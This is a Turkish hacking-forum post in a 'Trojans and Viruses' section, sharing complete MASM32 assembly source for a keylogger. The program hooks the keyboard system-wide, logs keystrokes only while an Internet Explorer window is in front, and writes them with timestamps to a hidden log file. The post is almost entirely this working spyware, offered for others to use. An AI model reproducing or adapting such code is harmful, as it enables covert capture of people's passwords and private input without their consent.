Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Trojan ve Virüsler

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

balık yemek değil balık tutmak

Trojan ve Virüsler

Yeni Konu aç Cevapla
 
Seçenekler
Alt 10-05-2012 19:41   #1
  • Üsteğmen
  • Üye Bilgileri
Üyelik tarihi
12/2010
Nereden
ADANA
Yaş
27
Mesajlar
Konular

Teşekkür (Etti): 145
Teşekkür (Aldı): 39


balık yemek değil balık tutmakişte masm32 ortamında yazılmış bir local keylogger örneği. bizzat microlab dersinde yazdık. el emeği göz nuru

.386
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib

KBDLLHOOKSTRUCT STRUCT

vkCode DWORD ?
scanCode DWORD ?
dwFlags DWORD ?
time DWORD ?
dwExtraInfo DWORD ?

KBDLLHOOKSTRUCT ENDS

keybproc PROTO DWORD, DWORD, DWORD

.data

file HANDLE 0
buffer_offset DWORD 0
caps_lock_on BOOL 0
shift BOOL 0
caps BOOL 0

.const

class_name db "kLogger", 0
log_file db "key.log", 0
logger_started db "Logger started ", 0
logger_stopped db 13, 10, "Logger stopped ", 0
format_time db "%02d.%02d.%d %02d:%02d (UTC)" ,13,10,0
error db "Error",0
ie_title db "Internet Explorer",0.data?
buffer db 32 dup(?)
hinst HINSTANCE ?
written DWORD ?
ghwnd HWND ?
.code
start:
invoke GetModuleHandle,NULL
mov hinst,eax
call main
invoke ExitProcess,eax


main proc
LOCAL wc:WNDCLASSEX
LOCAL hook:HHOOK
LOCAL msg:MSG

invoke CreateFile, addr log_file,GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
mov file,eax
.IF(eax== INVALID_HANDLE_VALUE)
invoke MessageBox, NULL, addr error, addr error, MB_OK
ret
.ENDIF
invoke GetLastError
.IF (eax==ERROR_ALREADY_EXISTS)
invoke SetFilePointer,file,0,NULL,FILE_END
.ENDIF

invoke WriteFile,file,addr logger_started,15, addr written,NULL
call time2log

mov wc.cbSize, sizeof WNDCLASSEX
mov wc.style, CS_HREDRAW or CS_VREDRAW
mov wc.lpfnWndProc,offset main_wnd
mov wc.cbClsExtra, NULL
mov wc.cbWndExtra, WS_EX_CONTROLPARENT
push hinst
pop wc.hInstance
mov wc.hbrBackground, COLOR_BTNFACE+1
mov wc.lpszMenuName, NULL
mov wc.lpszClassName,offset class_name
mov wc.hIcon,NULL
mov wc.hIconSm,NULL
mov wc.hCursor,NULL
invoke RegisterClassEx,addr wc


.IF(!eax)

invoke MessageBox, NULL, addr error,addr error,MB_OK
ret
.ENDIF


invoke CreateWindowEx, NULL, addr class_name, NULL, 0, 0, 0, 0, 0, NULL, NULL, hinst, NULL

.IF(!eax)

invoke MessageBox, NULL, addr error,addr error,MB_OK
ret
.ENDIFmov ghwnd, eax
invoke GetKeyState, VK_CAPITAL

.IF(eax)

mov caps, 1
.ENDIF


invoke SetWindowsHookEx, WH_KEYBOARD_LL, addr keybproc, hinst, NULL
mov hook, eax


.WHILE TRUE
invoke GetMessage, addr msg, NULL, 0,0
.BREAK .IF(!eax)
invoke TranslateMessage, addr msg
invoke DispatchMessage, addr msg

.ENDWinvoke UnhookWindowsHookEx, hook
call flush_buffer
invoke WriteFile, file, addr logger_stopped, 17, addr written, NULL
call time2log

invoke CloseHandle, file


mov eax,msg.wParam
ret


main endp
main_wnd proc hwnd:HWND, msg:UINT, wparam:WPARAM, lparam:LPARAM

.IF(msg==WM_CLOSE)
invoke PostQuitMessage, NULL
.ELSE

invoke DefWindowProc, hwnd, msg, wparam, lparam
ret
.ENDIF


xor eax,eax
ret
main_wnd endpie_active proc

local hwnd: HWND
local text[256]: BYTE
local i: UINT
local j: UINT


call GetForegroundWindow
mov hwnd, eax

invoke GetWindowText, hwnd, addr text, SIZEOF text
mov i, eax
mov j,0

.WHILE(i)

mov ebx, j
invoke lstrcmpi, addr text[ebx], addr ie_title
.IF(!eax)

mov eax, 1
ret
.ENDIF
dec i
inc j
.ENDW


xor eax, eax
ret

ie_active endp

keybproc proc code DWORD, wparam:WPARAM, lparam: LPARAM

call ie_active
.IF (eax && (code == HC_ACTION))
mov ebx, lparam
assume ebxtr KBDLLHOOKSTRUCT
mov edx, [ebx].vkCode
.IF (wparam ==WM_KEYDOWN)
; if user hits f10 , we shut down
.IF (edx == VK_F10)
invoke PostMessage, ghwnd, WM_CLOSE, NULL, NULL
ret
.ENDIF

; keep track of shift and capslock

.IF (edx == VK_LSHIFT || edx ==VK_RSHIFT)
mov shift, 1
.ELSEIF (edx == VK_CAPITAL)
.IF (!caps_lock_on)
; toggle caps true/ false
xor caps, 1
mov caps_lock_on, 1
.ENDIF
.ELSE
;write to file if buffer might overflow
.IF (buffer_offset >=32-16)
call flush_buffer
.ENDIF

mov ecx, buffer_offset

.IF (edx == VK_SPACE|| edx == VK_RETURN || edx == VK_TAB)
mov buffer[ecx], dl
inc ecx
.ELSEIF (!shift && (edx>2Fh && edx < 3Ah))
; 0..9
mov buffer[ecx], dl
inc ecx
.ELSEIF (edx > 40h && edx < 5Bh)
mov eax, shift
xor eax , caps
.IF (!eax)
or edx, 20h
.ENDIF

mov buffer[ecx], dl
inc ecx
.ELSE

mov buffer[ecx], '['
inc ecx
.IF (shift)
mov buffer[ecx], '!'
inc ecx
.ENDIF

push ecx
mov eax , 32-1
sub eax, ecx
push eax
lea eax, buffer[ecx]
push eax
mov edx, [ebx].scanCode
mov eax, [ebx].dwFlags
shl edx , 16
shl eax , 24
or edx, eax
push edx
call GetKeyNameText
pop ecx
add ecx, eax
mov buffer[ecx], ']'
inc ecx
.ENDIF
mov buffer_offset, ecx
.ENDIF
.ELSEIF (wparam== WM_KEYUP)
.IF (edx == VK_LSHIFT || edx == VK_RSHIFT)
mov shift, 0
.ELSE
mov caps_lock_on, 0
.ENDIF
.ENDIF

assume ebx: nothing
.ENDIF

invoke CallNextHookEx , NULL, code, wparam, lparam

ret
keybproc endp
time2log proc
LOCAL SysTime:SYSTEMTIME
LOCAL output[32]:BYTE

;Get current date/time
invoke GetSystemTime,addr SysTime
lea ebx,SysTime
assume ebxtr SYSTEMTIME
xor eax,eax
mov ax,[ebx].wSecond
push eax
mov ax,[ebx].wMinute
push eax
mov ax,[ebx].wHour
push eax
mov ax,[ebx].wYear
push eax
mov ax,[ebx].wMonth
push eax
mov ax,[ebx].wDay
push eax
assume ebx:nothing
push offset format_time
lea eax,output
push eax
call wsprintf

;Write it to the log file
invoke WriteFile, file,addr output, eax, addr written, NULL
ret

time2log endp

flush_buffer proc
;Write buffered data to log file
.IF (buffer_offset!=0)
invoke WriteFile,file,addr buffer, buffer_offset,addr written,NULL

mov buffer_offset,0
.ENDIF
ret
flush_buffer endp
end start___________________________________________

Raspberry Pi, Arduino, UAV, Autopilot, Flight Controller, C, C++, C#, Windows Phone 8 ,Asp.net, Aforge.net framework ,Openlayers, Entity Framework, eBA süreç yönetimi, Oracle, Mssql, ödevler, projeler...


Konu WOLSİN tarafından (10-05-2012 19:48 Saat 19:48 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli

wau